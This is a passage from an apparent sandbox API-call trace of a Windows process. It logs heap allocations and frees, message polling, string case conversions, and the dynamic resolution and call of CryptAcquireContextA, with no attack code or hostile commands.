Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0166.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0166.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.008] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0166.008] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0166.008] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0166.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0166.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0166.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0166.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0166.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.012] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0166.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0166.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.013] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0166.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.013] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0166.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0166.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0166.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0166.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0166.016] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.016] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.016] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0166.016] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.016] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0166.017] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.017] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.017] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.017] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.017] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.017] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0166.017] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0166.017] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0166.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.017] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0166.017] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.018] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.018] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.018] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0166.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0166.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0166.018] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0166.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0166.019] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0166.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 